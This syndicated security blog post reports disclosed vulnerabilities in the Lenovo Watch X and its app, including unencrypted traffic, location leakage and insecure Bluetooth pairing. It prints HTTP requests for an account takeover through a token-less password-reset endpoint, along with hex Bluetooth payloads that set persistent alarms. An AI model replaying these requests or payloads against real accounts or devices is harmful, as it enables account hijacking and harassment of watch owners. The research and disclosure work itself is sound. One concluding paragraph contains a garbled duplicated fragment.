Monday, May 23, 2022
  • Is Zero Trust a Long-Term Security Solution? 
  • I joined Balbix to Fuel Explosive Growth Through a Partner Ecosystem
  • Secure Developer Velocity with Active Testing
  • BSides Prishtina 2022 – Armend Gashi’s ‘What Do OAuth And Football Clubs Have In Common?’
  • The Evolution of Ransomware: Understanding Its Past, Present, and Future

Security Boulevard Logo

Security Boulevard

The Home of the Security Bloggers Network

Community Chats Webinars Library
  • Home
    • Cybersecurity News
    • Features
    • Industry Spotlight
    • News Releases
  • Security Bloggers Network
    • Latest Posts
    • Contributors
    • Syndicate Your Blog
    • Write for Security Boulevard
  • Events
    • Upcoming Events
    • Upcoming Webinars
    • On-Demand Events
    • On-Demand Webinars
  • Chat
    • Security Boulevard Chat
    • Marketing InSecurity Podcast
  • Library
  • Related Sites
    • Techstrong Group
    • Container Journal
    • DevOps.com
    • Security Boulevard
    • Techstrong Research
    • Techstrong TV
    • Devops Chat
    • DevOps Dozen
    • DevOps TV
    • Digital Anarchist
  • Media Kit
  • About Us

  • Analytics
  • AppSec
  • CISO
  • Cloud
  • DevOps
  • GRC
  • Identity
  • Incident Response
  • IoT / ICS
  • Threats / Breaches
  • More
    • Blockchain / Digital Currencies
    • Careers
    • Cyberlaw
    • Mobile
    • Social Engineering
  • Humor
IoT & ICS Security Security Bloggers Network 

Home » Cybersecurity » IoT & ICS Security » Your Lenovo Watch X Is Watching You & Sharing What It Learns

SBN

Your Lenovo Watch X Is Watching You & Sharing What It Learns

by David Sopas on February 11, 2019

A friend of mine offered me a Lenovo Watch X – which costs around €60 – in return for helping him with a security project. I was impressed with the design and the quality of the watch. Of course, I also immediately wanted to test its security.

Lenovo Watch X Security Research Summary

I think we all understand why a smart device like the Lenovo Watch X needs to collect some types of information. As users, our hope is that only the necessary information is shared and stored, and that all of our personally identifiable information (PII) is handled securely and responsibly.

Cybersecurity Live - Boston

Unfortunately, during the course of my research I found quite a few vulnerabilities in my shiny new Lenovo Watch X. Each of the vulnerabilities concern me, but a few of them are pretty disturbing. I’ll name and describe the vulnerabilities, and then share how that vulnerability could be used in an attack scenario.

Vulnerability – Pinpoint Phone Location: Phone latitude and longitude coordinates regularly sent to a remote unknown server in China.

Attack scenario: Ability to track the location of the watch owner, not only by the unknown server in China” but also by anyone sniffing the network.

Vulnerability – Sniffing / MiTM: Communication sent between the mobile application and web server is not encrypted, so anyone could sniff the communication.

Attack scenario: A malicious user could grab user credentials, hijack accounts, and track users just by being on the same network as their victim(s).

Vulnerability –  Account Takeover: Due to lack of account validation and permissions, it’s possible to force a password change request for any user.

Attack scenario: Anyone who knows the userid could change the user password, and therefore hijack remote accounts.

Vulnerability –  Magic BLE: The Bluetooth Low Energy pairing allows pairing devices using only normal hand movement. There is no timeout system enabled.

Attack scenario: A malicious user could easy pair to the victim’s watch just using normal pairing; the natural movement of the hand makes a successful pairing easy.

Vulnerability –  Spoofing Calls: Write permissions on a specific GATT UUID allow the spoofing calls attack.

Attack scenario: A malicious user could send a specific command to the device and spoof incoming calls to the victim’s watch.

Vulnerability: Set Alarms: Write permissions on a specific GATT UUID allow setting alarms on the watch.

Attack scenario: A malicious user could send a specific command to the watch to set alarms. The function allows adding multiple alarms, as often as every minute.

Lenovo Watch X Android Application

My next step was to install the official Lenovo Watch X Android app, which has around +50,000 downloads. Then I started monitoring the traffic from the app. I wanted to see what permissions it required as well as what it sent to a remote server.

The Watch X Android app requires the following permissions:

  • permission.INTERNET
  • permission.READ_EXTERNAL_STORAGE
  • permission.WRITE_EXTERNAL_STORAGE
  • permission.BLUETOOTH_ADMIN
  • permission.BLUETOOTH
  • permission.ACCESS_COARSE_LOCATION
  • permission.GET_TASKS
  • permission.ACCESS_WIFI_STATE
  • permission.ACCESS_NETWORK_STATE
  • permission.CHANGE_WIFI_STATE
  • permission.READ_PHONE_STATE
  • permission.CAMERA
  • permission.CALL_PHONE
  • permission.WAKE_LOCK
  • permission.REQUEST_INSTALL_PACKAGES
  • permission.ACCESS_FINE_LOCATION
  • permission.ACCESS_LOCATION_EXTRA_COMMANDS
  • permission.RECEIVE_SMS
  • permission.READ_CONTACTS
  • permission.BIND_ACCESSIBILITY_SERVICE
  • permission.RECORD_AUDIO
  • permission.GET_ACCOUNTS
  • permission.USE_CREDENTIALS
  • permission.WRITE_SETTINGS
  • permission.FLASHLIGHT

I understand why the Android app needed some of these permissions, but others seemed a bit strange to me. I continued with my research and immediately noticed a strange request to a Chinese server:

POST /api/dmap-analysis-point-server/v2/insertBaseBurialPointInfoV2 HTTP/1.1
language: EN_HK
token:
visitorId: 1043065036087934976
Content-Type: application/json; charset=utf-8
Content-Length: 575
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

[{"appVersion":"2.4.1","boundTime":0,"equipmentModel":"0201060EFF03A35042303031DC41E5002084080957617463682058031400A800000000000000000000000000000000000000000000000000000000000000","equipmentType":1,"firmwareId":"PB001","firmwareVersion":"0.3.6","imei":"629*","latitude":"40.*","loginTime":1537801210,"longitude":"-8.*","phoneLanguage":"pt_PT","phoneModel":"LG-M320","phoneType":"lge","phoneVersion":"Android7.0","placeId":111007,"projectId":"AP110002","sn":"LGM3*","startUpNum":0,"userId":1043065036087934976,"userTime":30,"userType":"1"}]

At this point they already pinpointed my location – which by the way is exactly where I was. I hadn’t even registered for a Lenovo Watch account yet – but already they had my PII.

Latitude Longitude Reported on Lenovo Watch X

My next step was to register for an account. Registering triggered other alarms in my mind. For example, I did not see HTTPS in any requests sent between the application and the server. Essentially, anyone could launch a MiTM attack at that point, or even just watch what I’m doing.

Sniffing/MiTM

Next, I wanted to see exactly what information was being sent (unencrypted) between my app and the server. It was pretty easy to see everything – here are a few examples:

Checking if the email exists already

GET /api/dmap-auth-server/v1/user/email/code/email?email=[email protected]&type=1
HTTP/1.1
language: EN_HK
token:
visitorId: 1043065036087934976Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

Registering an account

POST /api/dmap-auth-server/v2/user/register/email HTTP/1.1
language: EN_HK
token:
visitorId: 1043065036087934976
Content-Type: application/json; charset=utf-8
Content-Length: 79
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

{"email":"[email protected]","password":"Testing9999","projectId":"AP110002"}

How many steps in a specific day?

GET /api/dmap-senor-server/v1/rank/get/day?time=1537743600&userId=1044244911384469504&stepNum=122
HTTP/1.1
language: EN_HK
token: 9ae1f5a5020c080c58a3d929ceb869db
visitorId: -1
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

Basically a malicious user could monitor any operation on the app. It was pretty clear that none of the data requested by the app was private.

Account Takeover

If nothing is private, what else can I do with this app? My next step was to create two accounts to see if I could hijack an account.

Step 1.

On account A change the password and write down the request:

POST /api/dmap-auth-server/v1/user/retrieve/password/update HTTP/1.1
language: EN_HK
token: TOKEN_FROM_A
visitorId: -1
Content-Type: application/json; charset=utf-8
Content-Length: 55
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

{"password":"Testing9999","userId":1044244911384469504}

Step 2.

On account B change the password of the account using the token from A:

POST /api/dmap-auth-server/v1/user/retrieve/password/update HTTP/1.1
language: EN_HK
token: TOKEN_FROM_A
visitorId: -1
Content-Type: application/json; charset=utf-8
Content-Length: 55
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

{"password":"Testing1111","userId":104490555487071436}

Step 3.

Open the account B and check if the password is Testing1111. And, unfortunately, it is. I just hijacked the account and changed the password.

Step 4.

Next, remove token header.

POST /api/dmap-auth-server/v1/user/retrieve/password/update HTTP/1.1
language: EN_HK
visitorId: -1
Content-Type: application/json; charset=utf-8
Content-Length: 55
Host: prod.api.app.d-map.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.11.0

{"password":"Testing11","userId":104490555487071436}

That works too! So an attacker only needs the userId, then can change the password from any user and gain access to all of the information stored by this app.

Hacking the BLE

Magic Pairing

My first approach to hacking the BLE was to check how to pair the watch with my Android phone. I needed to understand the pairing method.

When you first open the Android application, it tries to find your Lenovo Watch to pair it. You see the following screen:

Confirm Connect - Magic Pairing with Lenovo Watch X

You need to click on the watch button OR move your arm. If the victim is already walking that’s a natural movement right? I did try it and it worked. Just by walking it pairs the device.

But it gets better. I disconnected the device. And tried to pair it again. After blocking the phone and opening again, it bypassed the pairing…

Watch this in action: https://www.youtube.com/watch?v=5Q0Pi3O4r2k

The NSA Is Calling You

Next, I decided to sniff the BLE traffic using three Ubertooth (also known as Uberteeth). I caught some interesting stuff when making a call to the phone. Take a look:

NSA Calling the Lenovo Watch

and

NSA Calling the Lenovo Watch X

What I did was reply to both requests; I got the Levovo Watch X vibrating and telling me that I have an incoming call from “Amor.”

I decoded the hexadecimal value to ASCII, and it is possible to find where the text “Amor” is being sent:

41:6d:6f:72:00:69:6e:63:6f:8d -> Amor.inco

6d:69:6e:67 -> ming

So I wrote a small Python script that will trigger an incoming call from… the NSA! (Why not?)

You can see this in action: https://www.youtube.com/watch?v=1hzuSj4086s 

Set Alarms

Another discovery – you can mess around with the alarm setting on the watch, and it is a persistent alarm. For example, if an attacker writes the following data on the 0x0022 handle:

230109311d01010a01180788015200

It sets the watch to vibrate and inform the wearer of the alarm at 6:07pm (18:07).  Every ten minutes it will warn the user again, until the victim removes it. The victim must enter the app to disable this persistent alarm.

An attacker can go even further and enter a lot of alarms. In fact, an attacker could create some kind of denial of service with alarms:

230109311d01010a010300ff015200

This sets the alarm at 3 am every day. If you need to add more alarms, it’s all too easy – just change the number before the time:

230109311d01010a010300ff015200

Conclusions on the Lenovo Watch X

Based on this research, I made a few recommendations to Lenovo. I think the vulnerabilities on the Lenovo Watch X bear looking at – sharing my exact location with a remote server didn’t seem necessary for the Watch X to function as designed. It’s also a violation of my privacy, and clearly shares my PII. Encrypting communication between the Watch X, Android app, and the web server would help reduce the impact these issues, and it is basically best practice. Both the app and the watch need to confirm the pairing. making it far more difficult for a malicious user to pair with the smart watch. Setting a time out makes it less likely that an unintentional pairing could occur. Fixing the API permissions eliminates the ability of malicious users to send commands to the watch, spoof calls, and set alarms.

dart watch, and setting a time out makes it less likely that an unintentional pairing could occur. r to pair with the

Smart devices like the Lenovo Watch X track a lot of information about you, and some of that may make your life more convenient. By testing the security of smart watches (among other devices), we can help vendors learn that the vulnerabilities in their software lead to problems for their users, and they need to build better, more secure, software and devices to prevent that.

Amazon Echo: Alexa Leveraged as a Silent Eavesdropper

Disclosure Timeline

24-Oct-2018 Reports sent to Lenovo’s PSIRT (Product Security Incident Response Team)
16-Nov-2018 Sent reminders to Lenovo’s PSIRT
16-Nov-2018 Lenovo confirmed they got the reports
26-Nov-2018 Lenovo PSIRT opened a case, reference LEN-25446
27-Nov-2018 Sent our intent to publish
29-Nov-2018 PSIRT asked not to publish before early January
13-Dec-2018 Lenovo requested some clarifications
14-Dec-2018 Sent clarifications
08-Jan-2019 Lenovo PSIRT updated that they moved ownership to a 3rd party provider
16-Jan-2019 3rd party confirmed fixes are issued

  • Account Takeover
  • BLE
  • bluetooth
  • Checkmarx Security Research Team
  • Internet Of Things
  • IoT
  • Lenovo Watch X
  • MitM
  • smart watch
  • Sniffing

David Sopas

AppSec Research Team Leader

David Sopas is an AppSec Research team leader at Checkmarx and co-founder of Char49. Google, Yahoo!, eBay, Microsoft, US Dept. of Defense and many other companies and organizations have acknowledged his work. As a former part-time bounty-hunter, he’s still top5 on Cobalt and top100 on HackerOne. These days, David enjoys breaking IoT devices and hacking his life as much as possible.


Latest posts by David Sopas

Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT – February 4, 2019
Smart Bulb Offers Light, Color, Music, and… Data Exfiltration? – November 21, 2018
Navigation Apps: Leading the Way? Or Following You? – November 15, 2018


Recent Articles By Author
  • LeapFrog LeapPad Ultimate Security Vulnerabilities
  • Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT
  • Smart Bulb Offers Light, Color, Music, and… Data Exfiltration?
More from David Sopas

*** This is a Security Bloggers Network syndicated blog from Blog – Checkmarx authored by David Sopas. Read the original post at: https://www.checkmarx.com/2019/02/12/lenovo-watch-watching-you/

February 11, 2019February 11, 2019 David Sopas account takeover, BLE, Blog, bluetooth, Checkmarx Security Research Team, Internet of things, iot, Lenovo Watch X, mitm, smart watch, Sniffing, Technical Blog
  • ← Why Azure® AD Is Lock-In?
  • Data Protection Leadership Forum — Breaking Down the Challenges →

TechStrong TV – Live

Click full-screen to enable volume control
Watch latest episodes and shows

Subscribe to our Newsletters

Get breaking news, free eBooks and upcoming events delivered to your inbox.
  • View Security Boulevard Privacy Policy
  • This field is for validation purposes and should be left unchanged.

Most Read on the Boulevard

Surge in Malware Downloads Driven by SEO-Based Techniques 
‘Incompetent’ Tesla Lets Hackers Steal Cars — via Bluetooth
Conti Ransomware Gang Threatens Costa Rica’s Government
US Lawmakers Seek Uniform Policy on Nation-State Cyberattacks
The True Danger for Organizations: Unpatched Vulnerabilities
Radware Mitigates 1.1Tbps DDoS Attack
Tips to Train Your Employees on Cybersecurity
Cloud computing concentration and systemic risk
Steganography in Cybersecurity: A Growing Attack Vector
DNS Over HTTPS: Facts You Should Know

Upcoming Webinars

Thu 26

Challenges and Opportunities for Improving Secure Coding Practices

May 26 @ 3:00 pm - 4:00 pm
Tue 31

Leveraging a Cloud Data Platform to Respond to Cybersecurity Events

May 31 @ 11:00 am - 12:00 pm
Jun 01

The 2022 Guide to API Security

June 1 @ 11:00 am - 12:00 pm
Jun 01

Security From Code to Cloud and Back to Code

June 1 @ 1:00 pm - 2:00 pm
Jun 08

Beyond Unification: How CNAP Should Reduce Cloud Security Risk

June 8 @ 11:00 am - 12:00 pm
Jun 08

When Less Is More: Full Life Cycle Serverless Security

June 8 @ 1:00 pm - 2:00 pm
Jun 15

Top 5 Reasons Why Effective SDLC Security Controls Are So Difficult

June 15 @ 1:00 pm - 2:00 pm
Jun 21

Why Cloud-Native Applications and APIs Are at Risk

June 21 @ 1:00 pm - 2:00 pm
Jun 28

CISO Talk Master Class Episode: Catch Lightning in a Bottle – The Essentials: Bringing It All Together

June 28 @ 1:00 pm - 2:00 pm

More Webinars

Download Free eBook

The Dangers of Open Source Software and Best Practices for Securing Code

Industry Spotlight

Cars in the Crosshairs: Automakers, Regulators Take on Cybersecurity
Cybersecurity Governance, Risk & Compliance Industry Spotlight IoT & ICS Security Security Awareness Security Boulevard (Original) Threat Intelligence 

Cars in the Crosshairs: Automakers, Regulators Take on Cybersecurity

May 23, 2022 Mike Hodge | Yesterday 0
Establishing a Root of Trust in Embedded Linux and IoT
Cybersecurity Endpoint Industry Spotlight IoT & ICS Security Security Boulevard (Original) Vulnerabilities 

Establishing a Root of Trust in Embedded Linux and IoT

April 18, 2022 Anita Buehrle | Apr 18 Comments Off on Establishing a Root of Trust in Embedded Linux and IoT
Attorney-Client Privilege and Email Privacy
Cybersecurity Data Security Identity & Access Industry Spotlight Network Security Security Boulevard (Original) 

Attorney-Client Privilege and Email Privacy

April 7, 2022 Mark Rasch | Apr 07 Comments Off on Attorney-Client Privilege and Email Privacy

Top Stories

US Lawmakers Seek Uniform Policy on Nation-State Cyberattacks
Analytics & Intelligence Cyberlaw Cybersecurity Featured Governance, Risk & Compliance News Security Boulevard (Original) Threats & Breaches 

US Lawmakers Seek Uniform Policy on Nation-State Cyberattacks

May 20, 2022 George V. Hulme | 3 days ago 0
‘Incompetent’ Tesla Lets Hackers Steal Cars — via Bluetooth
Analytics & Intelligence Application Security Cybersecurity DevOps Endpoint Featured Governance, Risk & Compliance Identity & Access Incident Response IoT & ICS Security Mobile Security Most Read This Week Network Security News Popular Post Security Awareness Security Boulevard (Original) Social Engineering Spotlight Threat Intelligence Threats & Breaches Vulnerabilities 

‘Incompetent’ Tesla Lets Hackers Steal Cars — via Bluetooth

May 19, 2022 Richi Jennings | 4 days ago 0
Conti Ransomware Gang Threatens Costa Rica’s Government
Cybersecurity Data Security Featured Governance, Risk & Compliance Malware News Security Boulevard (Original) Spotlight Threat Intelligence Vulnerabilities 

Conti Ransomware Gang Threatens Costa Rica’s Government

May 19, 2022 Nathan Eddy | 4 days ago 0

Security Humor

XKCD 'Angular Diameter Turnaround'

XKCD ‘Angular Diameter Turnaround’

Security Boulevard Logo White

DMCA

Join the Community

  • Add your blog to Security Bloggers Network
  • Write for Security Boulevard
  • Bloggers Meetup and Awards
  • Ask a Question
  • Email: [email protected]

Useful Links

  • About
  • Media Kit
  • Sponsors Info
  • Copyright
  • TOS
  • DMCA Compliance Statement
  • Privacy Policy

Related Sites

  • Techstrong Group
  • Container Journal
  • DevOps.com
  • Techstrong Research
  • Techstrong TV
  • DevOps Chat
  • DevOps Dozen
  • DevOps TV
  • Digital Anarchist
Powered by Techstrong Group
Copyright © 2022 Techstrong Group Inc. All rights reserved.